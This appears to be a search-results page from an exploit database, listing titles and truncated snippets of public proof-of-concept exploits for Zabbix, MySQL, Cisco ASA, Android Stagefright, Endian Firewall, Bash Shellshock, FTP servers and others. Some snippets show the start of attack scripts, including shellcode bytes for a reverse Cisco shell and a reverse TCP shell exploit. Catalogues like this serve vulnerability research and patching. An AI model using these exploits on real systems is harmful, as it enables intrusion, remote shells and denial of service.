276 matches found
Zabbix 2.0 < 3.0.3 - SQL Injection
Exploit for php platform in category web applications Exploit Title: 2.0 Zabbix 3.0.4 SQL Injection Python PoC Data: 20-08-2016 Software Link: www.zabbix.com Exploit Author: Unknown http://seclists.org/fulldisclosure/2016/Aug/82 Version: Zabbix 2.0-3.0.x3.0.4 PoC Author: Zzzians Contact:...
Python Exploit Development GDB Assistance: Peda
Python Exploit Development GDB Assistance PEDA is a Python GDB script with many handy commands to help speed up exploit development process on Linux/Unix. It is also a framework for writing custom interactive Python GDB commands. PEDA v1.1 Released Requirements PEDA 1.0 is only support Linux GDB...
Exploit for HTTP Response Splitting in Python
CVE-2016-5699-poc PoC code of CVE-2016-...
MySQL 5.5.45 - procedure analyse Function Denial of Service
MySQL 5.5.45 - procedure analyse Function Denial of Service !/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up:...
MySQL 5.5.45 - procedure analyse Function Denial of Service
!/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-487...
Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow
Exploit for hardware platform in category remote exploits !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...
Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Exploit for Android platform in category remote exploits Source: https://github.com/NorthBit/Metaphor Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd. Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf Twitter:...
4images 1.7.11 Code Execution
!/usr/local/bin/python Exploit for 4images 1.7.11 Code Execution vulnerability An admin account is required to use this exploit Curesec GmbH import sys import re import argparse import requests requires requests lib parser = argparse.ArgumentParser parser.addargument"url", help="base url to...
SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python -- coding: utf-8 -- Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC Discovery by : Luis Martínez Email : email protected Discovery Date : 18/11/2015 Vendor Homepage :...
ClipperCMS 1.3.0 - Code Execution
ClipperCMS 1.3.0 - Code Execution !/usr/local/bin/python Exploit for ClipperCMS 1.3.0 Code Execution vulnerability An account is required with rights to file upload eg a user in the Admin, Publisher, or Editor role The server must parse htaccess files for this exploit to work. Curesec GmbH...
XMPlay 3.8.1.12 Proof Of Concept
!/usr/bin/env python Exploit Title: XMPlay .pls Local Crash poc Date: 2015-08-16 Exploit Author: St0rn Twitter: st0rnpentest Vendor Homepage: http://www.un4seen.com/ Software Link: http://www.un4seen.com/download.php?xmplay38 Version: 3.8.1.12 Tested on: Windows 7 Stack Overflowing xmplay, but we...
ISC BIND 9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service PoC !/usr/bin/env python Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 import socket import sys print'CVE-2015-5477 BIND9 TKEY Po...
Endian Firewall 3.0.0 - OS Command Injection (Python)
Endian Firewall 3.0.0 - OS Command Injection Python !/usr/bin/env python Endian Firewall Proxy User Password Change /cgi-bin/chpasswd.cgi OS Command Injection Exploit POC Reverse TCP Shell Ben Lincoln, 2015-06-28 http://www.beneaththewaves.net/ Requires knowledge of a valid proxy username and...
Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Vulnerability
Proof of concept exploit for the Pitbull and w3tw0rk IRC bots that takes over the owner of a bot which then allows for remote code execution. thehunter.py Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution author: @shipcod3 description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0r...
Exploit for Out-of-bounds Write in Gnu Glibc
PoC exploit for CVE-2015-0235, a Glibc Gethostbyname DoS vulne...
IP.Board 3.4.7 SQL Injection
!/usr/bin/env python Sunday, November 09, 2014 - [email protected] IP.Board - http://sourceforge.net/projects/socksipy/ import socks, socket socks.setdefaultproxysocks.PROXYTYPESOCKS5, "127.0.0.1", 9050 socket.socket = socks.socksocket import urllib2, urllib def injectsql: try:...
Exploit for OS Command Injection in Gnu Bash
CGIShell ======== shellshock C...
Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)
No description provided by source. !/usr/bin/env python coding: utf-8 import os import syslog from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '87249' ssvid version = '1.0' author = 'coc' vulDate = '' createDat...
WWW File Share Pro v7.0 - Remote Denial of Service
Document Title: =============== WWW File Share Pro v7.0 - Remote Denial of Service References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1309 View: https://www.youtube.com/watch?v=1Y-B7ctbixs Release Date: ============= 2014-08-29 Vulnerability Laboratory ID VL-ID:...
Freefloat FTP Server (LIST command) Buffer Overflow Exploit
No description provided by source. !/usr/bin/python from struct import pack import socket,sys import os print ||=============================================================|| print || || print || / \ 0-Exploit Zer0 Thunder || print || \ \ ,, / /--------------------------------------------|| prin...